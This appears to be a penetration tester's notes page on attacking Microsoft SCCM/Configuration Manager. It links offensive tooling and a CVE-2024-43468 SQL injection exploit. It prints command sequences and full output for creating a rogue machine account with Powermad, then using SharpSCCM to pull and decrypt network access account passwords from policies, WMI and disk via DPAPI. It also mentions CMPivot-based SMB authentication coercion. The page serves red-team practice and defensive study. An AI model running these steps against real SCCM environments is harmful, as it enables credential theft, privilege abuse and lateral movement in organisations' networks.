SCCM

CVE-2024-43468 - SQLi

LogoGitHub - synacktiv/CVE-2024-43468GitHub

Tools

Netexec

Requires Domain Admin or Local Admin Priviledges on target Domain Controller

#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --sccm
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --sccm disk
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --sccm wmi

Recon - pssrecon

LogoGitHub - slygoo/pssreconGitHub

CCMPwn

LogoGitHub - mandiant/ccmpwnGitHub

SCCMHound - Bloodhound Collector

LogoGitHub - CrowdStrike/sccmhound: A BloodHound collector for Microsoft Configuration ManagerGitHub

SCCMHunter

LogoGitHub - garrettfoster13/sccmhunter at devGitHub

SCCMSecrets

Exploiting SCCM policies distribution for credentials harvesting, initial access and lateral movement

LogoGitHub - synacktiv/SCCMSecrets: SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting, initial access and lateral movement.GitHub
LogoSCCMSecrets.py: exploiting SCCM policies distribution for credentials harvesting, initial access and lateral movementSynacktiv

pySQLRecon

Get Credentials

LogoMisconfiguration-Manager/attack-techniques/CRED/CRED-5/cred-5_description.md at main · subat0mik/Misconfiguration-ManagerGitHub

Loot:

LogoMisconfiguration-Manager/attack-techniques/CRED/CRED-6/cred-6_description.md at main · subat0mik/Misconfiguration-ManagerGitHub
LogoGitHub - badsectorlabs/sccm-http-looter: Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) shares via HTTP(s)GitHub
LogoGitHub - shelltrail/cmlootGitHub

MAQ

LogoMisconfiguration-Manager/attack-techniques/CRED/CRED-2/cred-2_description.md at main · subat0mik/Misconfiguration-ManagerGitHub
LogoGitHub - Mayyhem/SharpSCCM: A C# utility for interacting with SCCMGitHub
Import-Module .\Powermad.psm1
New-MachineAccount -MachineAccount chell$
Enter a password for the new machine account: ********
[+] Machine account chell$ added

.\SharpSCCM.exe get secrets -r newdevice -u chell$ -p <password>

[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SITE-SERVER.APERTURE.LOCAL
[+] Site code: PS1
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A08205810482057D3082057930820575060B2A864886F70D010C0A0...7C774335FF3E3CFF78303B301F300706052B0E03021A04143E425851728AA802C85337E75D471A47A1C3D9C004147C30C849A46B55FFC1D3A1A2364D506B350C28E9020207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: newdevice
      NetBIOS name: newdevice
      Authenticating as: chell$
      Site code: PS1
[+] Sending HTTP registration request to SITE-SERVER.APERTURE.LOCAL:80
[+] Received unique SMS client GUID for new device:

    GUID:72C913C4-F54F-4A07-9EED-918DC07F7EAD

[+] Obtaining Full Machine policy assignment from SITE-SERVER.APERTURE.LOCAL PS1
[+] Found 43 policy assignments
[+] Found policy containing secrets:
      ID: {c6fe32fb-7e9c-4776-abe3-2a6d107447f1}
      Flags: RequiresAuth, Secret, IntranetOnly, PersistWholePolicy
      URL: http://<mp>/SMS_MP/.sms_pol?{c6fe32fb-7e9c-4776-abe3-2a6d107447f1}.2_00
[+] Adding authentication headers to download request:
      ClientToken: GUID:72C913C4-F54F-4A07-9EED-918DC07F7EAD;2023-10-26T19:06:06Z
      ClientTokenSignature: 87F9D5EB1F1A951B9C93C569357896169B35CFA0BA3FEB150725B2B30DE7EAC58DA8F64D149ADBD5694BC3BE144B16AAF17D239A63D7035DFDB50B74A8FB66B66965FE8BDBB0AF9785840BED46B4E2471CA00D5C9C4D278206398B5E03228DCC8E9381D7388A5D4AD67BCF03B8E45C1EA538C1639012EC1BA434E0BBAAB6EEE990E9469A7BD275279B86FDB3A4FD2BF701ADCB8416F0797BB461BE15A5B274B373C1FC3347C68C0EB3C1F48B7DD357618E4B875CEE432ACC35321D62A6657E1994D646EB0D4EAFDDEB1F54AC0A2A6E8EE0113EB2761B9B35DF32568787BA23FF3A2A9C5B4A666409C1DEB8C09B597D69B973D807F14C973123B2284766033B70
[+] Received encoded response from server for policy {c6fe32fb-7e9c-4776-abe3-2a6d107447f1}
[+] Successfully decoded and decrypted secret policy
[+] Decrypted secrets:

NetworkAccessUsername: APERTURE\networkaccess
NetworkAccessPassword: <password>
NetworkAccessUsername: APERTURE\networkaccess
NetworkAccessPassword: <password>

[+] Completed execution in 00:00:05.9045603
LogoMisconfiguration-Manager/attack-techniques/CRED/CRED-3/cred-3_description.md at main · subat0mik/Misconfiguration-ManagerGitHub
PS C:\tools\SharpSCCM.exe local secrets -m wmi

[+] Connecting to \\127.0.0.1\root\ccm\policy\Machine\ActualConfig

[+] Retrieving network access account blobs via WMI
[+] Retrieving task sequence blobs via WMI
[+] Retrieving collection variable blobs via WMI

[+] Modifying permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Modifying permissions on registry key: SECURITY\Policy\PolEKList
[+] Reverting permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Reverting permissions on registry key: SECURITY\Policy\PolEKList

[+] Secret: DPAPI_SYSTEM
    full: <SNIP>
     m/u: <SNIP> / <SNIP>

[+] SYSTEM master key cache:
    {GUID}:SHA1
    {GUID}:SHA1
    {GUID}:SHA1

[+] Decrypting network access account credentials

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: SuperSecretPassword

[+] No task sequences were found
[+] No collection variables were found

[+] Completed execution in 00:00:02.8605620
LogoMisconfiguration-Manager/attack-techniques/CRED/CRED-4/cred-4_description.md at main · subat0mik/Misconfiguration-ManagerGitHub
PS C:\tools\> .\SharpSCCM.exe local secrets -m disk

[+] Retrieving secret blobs from CIM repository

[+] Modifying permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Modifying permissions on registry key: SECURITY\Policy\PolEKList
[+] Reverting permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Reverting permissions on registry key: SECURITY\Policy\PolEKList

[+] Secret: DPAPI_SYSTEM
    full: <SNIP>
     m/u: <SNIP> / <SNIP>

[+] SYSTEM master key cache:
    {GUID}:SHA1
    {GUID}:SHA1
    {GUID}:SHA1

[+] Decrypting 3 network access account secrets

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: SuperSecretPassword

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: SuperSecretPassword

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: SuperSecretPassword

[+] Completed execution in 00:00:03.4568194

Client Coercion

CMPivot queries can be used to coerce SMB authentication from #SCCM client hosts

LogoFurther Adventures With CMPivot — Client CoercionPosts By SpecterOps Team Members
LogoGitHub - Mayyhem/SharpSCCM: A C# utility for interacting with SCCMGitHub

Resources

LogoSCCM / MECM | The Hacker Recipes
LogoSCCM / MECM LAB - Part 0x3 - Admin UserMayfly
PreviousKerberos Double Hop ProblemNextMDT

Last updated